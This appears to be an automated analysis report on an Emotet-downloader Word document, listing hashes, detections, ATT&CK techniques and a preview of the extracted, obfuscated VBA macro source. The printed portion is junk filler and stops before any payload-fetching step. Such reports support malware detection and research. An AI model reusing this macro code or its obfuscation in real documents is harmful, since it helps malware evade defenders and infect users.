Emotet Office (OLE) malware analysis — malicious · 63f61cf60d70a2dc

MALICIOUS

Office (OLE)

168.6 KB Created: 2018-07-24 10:30:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: a946c67903c5c286f1a70b625e79ed32 SHA-1: 52bc2597fa6a6cd65e7655fc77d43b4ff26c1c7a SHA-256: 63f61cf60d70a2dc22eb6012f5c67ceb2aed7988d8835a5ed9f50ee0f3e8ee8e

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6960064-0', indicating it's a downloader. Critical heuristics confirm the presence of VBA macros and a Shell() call within the Document_Open macro. This strongly suggests the macro is designed to download and execute a secondary payload, a common Emotet tactic.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6960064-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6960064-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34805 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34805 bytes
SHA-256: `9dc022cf82c11648c6de9da555147508f3bc21a9c291e348525c1c4354f137dc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "cBDXlrSiww" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function twXAiWH() On Error Resume Next If JzCuBC <> zIKiqo Then CszXU = 137497106 * viBZE Else JzmjoE = 42683 - 95455 - (93170 + aXWzO / TQNlt + jhrjqU) * 1702 * vdpLsn - 25788 + 52907 If dUrdw >= ZBWzr Then kLSvY = EpFOC End If End If If KzhKF <> qsvjQC Then nQSiT = 137497106 * JTLRX Else UZImQ = 30620 - 35527 - (89272 + lUrqR / BTpbC + QaoWWu) * 65203 * wzfKuk - 3768 + 64456 If iTwIw >= vbrBv Then AWpUX = wUPtV End If End If If Mmojw <> WTNKHD Then TZsvfs = 137497106 * fzdpqW Else DNqlwN = 1931 - 68270 - (27997 + uvUZo / LiRmkZ + TOdwcO) * 18518 * qZATGW - 47462 + 17669 If jkKlAj >= MqKRH Then kwdlX = VPYUE End If End If If hMMIPE <> KbGZzv Then oVcBs = 137497106 * WTOGju Else RqsuD = 4082 - 61360 - (92773 + PZYaYW / LiFzv + fGVPvU) * 26419 * GbVjXU - 68237 + 22379 If vPEtF >= dSXAz Then cawci = mZoGL End If End If End Function Private Function zSfPlks() On Error Resume Next If JkVzp = 14 Then SuNYW = iiziU - 576 - 11146 / NtbjBV + bRarbP / mNDDh - CkCfB - wZEbi pEzPI = 72132 - UKrcnh * 88908 + OsjiQS * 96279 * 82681 End If If rDXpRM = 14 Then cYRGWU = AcwiT - 38885 - 87335 / PdAGD + tWmOF / wOlRIa - jUqvl - BzjsVO BhouoL = 18044 - jBisRZ * 46788 + rfasFM * 78947 * 47173 End If If PBOMi = 14 Then zHtQa = czRbwS - 22487 - 6447 / RcLpM + VrosPM / vHYXX - sKjHL - CcbdQ MivwY = 6515 - RUiQE * 45782 + iDBJD * 48561 * 90170 End If If UoisMF = 14 Then bUocQ = BXkQv - 86978 - 25267 / wwsaDw + oHfkIC / LMSmDI - hCBXf - RbJCL wWqpSJ = 13431 - nMJsI * 4201 + LYzJp * 8692 * 64795 End If If vitZaX = 14 Then rSmLWW = SFNzL - 15419 - 28404 / HThhVw + GrNTY / DEvjU - wPHcsV - MLFAfV zaZrtB = 88921 - LvwCz * 84435 + ASOqW * 35327 * 67789 End If If zvsji = 14 Then SwZzJD = wQcbM - 84893 - 2053 / IjFViE + zPhbB / SdrQX - btDfVA - WOnKYA dpMmOA = 90020 - wJRhB * 83678 + nkLoMZ * 96022 * 9920 End If End Function Private Function UGiQnZbCzO() On Error Resume Next If XRFrGS <> JwNit Then nYhui = 137497106 * LwuVV Else KvAlP = 39606 - 90813 - (11248 + SCuhN / XTftz + ddBizB) * 83162 * rcvjVw - 44117 + 44321 If htjnA >= VnNQC Then dPcYpj = zHQSD End If End If If qGKMR <> zvzANt Then Ifrlko = 137497106 * NMTLjP Else YQRaf = 35244 - 53393 - (60408 + cBzJo / ScLvEK + QiiPZ) * 21781 * nwfBnb - 58705 + 61159 If haAcQ >= klfHf Then rAkLuE = nsQsQ End If End If If FwITX <> roWiN Then TjOBN = 137497106 * OrjiVL Else RuSrN = 57266 - 17988 - (1981 + uuCpM / zGFOjv + dsjTw) * 305 * ZXdzz - 10610 + 25391 If wIAEB >= pUzYT Then uccHcb = RZLtfJ End If End If If iFmlE <> rRpEpU Then BnaLPG = 137497106 * wODGHt Else izhwPv = 8352 - 87253 - (30986 + nQMRnf / RNRll + rjINW) * 29568 * jdKNI - 37849 + 15547 If ZZvHX >= XztLIj Then oucszz = NHihdO End If End If End Function Private Function VzWMEmCdUDh() On Error Resume Next If awHIhi = 14 Then RMAAYn = bhbIQR - 3745 - 7510 / jpMFK + AuLpZj / WCijsc - LtfUq - ptCwYp uXTUY = 65548 - LFpiN * 99400 + KYZjZZ * 87826 * 80107 End If If jzazj = 14 Then MwXNc = rCkFXQ - 8847 - 65478 / vVQsh + OEcJFP / EjXYX - FajwL - piBlHI KtlcKF = 3923 - wrvDX * 60667 + zAiwsw * 54865 * 77307 End If If FLsOM = 14 Then UAbER = HMTVh - 13280 - 67468 / snBJlB + JPhiF / DEtJK - YbCwaN - sVfWPV YfRKi = 57185 - QKluW * 23710 + DIZMWU * 2048 ... (truncated)

SHA-256: 9dc022cf82c11648c6de9da555147508f3bc21a9c291e348525c1c4354f137dc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "cBDXlrSiww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function twXAiWH()
On Error Resume Next
   If JzCuBC <> zIKiqo Then
      CszXU = 137497106 * viBZE
      Else
      JzmjoE = 42683 - 95455 - (93170 + aXWzO / TQNlt + jhrjqU) * 1702 * vdpLsn - 25788 + 52907
      If dUrdw >= ZBWzr Then
         kLSvY = EpFOC
      End If
   End If
   If KzhKF <> qsvjQC Then
      nQSiT = 137497106 * JTLRX
      Else
      UZImQ = 30620 - 35527 - (89272 + lUrqR / BTpbC + QaoWWu) * 65203 * wzfKuk - 3768 + 64456
      If iTwIw >= vbrBv Then
         AWpUX = wUPtV
      End If
   End If
   If Mmojw <> WTNKHD Then
      TZsvfs = 137497106 * fzdpqW
      Else
      DNqlwN = 1931 - 68270 - (27997 + uvUZo / LiRmkZ + TOdwcO) * 18518 * qZATGW - 47462 + 17669
      If jkKlAj >= MqKRH Then
         kwdlX = VPYUE
      End If
   End If
   If hMMIPE <> KbGZzv Then
      oVcBs = 137497106 * WTOGju
      Else
      RqsuD = 4082 - 61360 - (92773 + PZYaYW / LiFzv + fGVPvU) * 26419 * GbVjXU - 68237 + 22379
      If vPEtF >= dSXAz Then
         cawci = mZoGL
      End If
   End If
End Function
Private Function zSfPlks()
On Error Resume Next
   If JkVzp = 14 Then
      SuNYW = iiziU - 576 - 11146 / NtbjBV + bRarbP / mNDDh - CkCfB - wZEbi
      pEzPI = 72132 - UKrcnh * 88908 + OsjiQS * 96279 * 82681
   End If
   If rDXpRM = 14 Then
      cYRGWU = AcwiT - 38885 - 87335 / PdAGD + tWmOF / wOlRIa - jUqvl - BzjsVO
      BhouoL = 18044 - jBisRZ * 46788 + rfasFM * 78947 * 47173
   End If
   If PBOMi = 14 Then
      zHtQa = czRbwS - 22487 - 6447 / RcLpM + VrosPM / vHYXX - sKjHL - CcbdQ
      MivwY = 6515 - RUiQE * 45782 + iDBJD * 48561 * 90170
   End If
   If UoisMF = 14 Then
      bUocQ = BXkQv - 86978 - 25267 / wwsaDw + oHfkIC / LMSmDI - hCBXf - RbJCL
      wWqpSJ = 13431 - nMJsI * 4201 + LYzJp * 8692 * 64795
   End If
   If vitZaX = 14 Then
      rSmLWW = SFNzL - 15419 - 28404 / HThhVw + GrNTY / DEvjU - wPHcsV - MLFAfV
      zaZrtB = 88921 - LvwCz * 84435 + ASOqW * 35327 * 67789
   End If
   If zvsji = 14 Then
      SwZzJD = wQcbM - 84893 - 2053 / IjFViE + zPhbB / SdrQX - btDfVA - WOnKYA
      dpMmOA = 90020 - wJRhB * 83678 + nkLoMZ * 96022 * 9920
   End If
End Function
Private Function UGiQnZbCzO()
On Error Resume Next
   If XRFrGS <> JwNit Then
      nYhui = 137497106 * LwuVV
      Else
      KvAlP = 39606 - 90813 - (11248 + SCuhN / XTftz + ddBizB) * 83162 * rcvjVw - 44117 + 44321
      If htjnA >= VnNQC Then
         dPcYpj = zHQSD
      End If
   End If
   If qGKMR <> zvzANt Then
      Ifrlko = 137497106 * NMTLjP
      Else
      YQRaf = 35244 - 53393 - (60408 + cBzJo / ScLvEK + QiiPZ) * 21781 * nwfBnb - 58705 + 61159
      If haAcQ >= klfHf Then
         rAkLuE = nsQsQ
      End If
   End If
   If FwITX <> roWiN Then
      TjOBN = 137497106 * OrjiVL
      Else
      RuSrN = 57266 - 17988 - (1981 + uuCpM / zGFOjv + dsjTw) * 305 * ZXdzz - 10610 + 25391
      If wIAEB >= pUzYT Then
         uccHcb = RZLtfJ
      End If
   End If
   If iFmlE <> rRpEpU Then
      BnaLPG = 137497106 * wODGHt
      Else
      izhwPv = 8352 - 87253 - (30986 + nQMRnf / RNRll + rjINW) * 29568 * jdKNI - 37849 + 15547
      If ZZvHX >= XztLIj Then
         oucszz = NHihdO
      End If
   End If
End Function
Private Function VzWMEmCdUDh()
On Error Resume Next
   If awHIhi = 14 Then
      RMAAYn = bhbIQR - 3745 - 7510 / jpMFK + AuLpZj / WCijsc - LtfUq - ptCwYp
      uXTUY = 65548 - LFpiN * 99400 + KYZjZZ * 87826 * 80107
   End If
   If jzazj = 14 Then
      MwXNc = rCkFXQ - 8847 - 65478 / vVQsh + OEcJFP / EjXYX - FajwL - piBlHI
      KtlcKF = 3923 - wrvDX * 60667 + zAiwsw * 54865 * 77307
   End If
   If FLsOM = 14 Then
      UAbER = HMTVh - 13280 - 67468 / snBJlB + JPhiF / DEtJK - YbCwaN - sVfWPV
      YfRKi = 57185 - QKluW * 23710 + DIZMWU * 2048
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.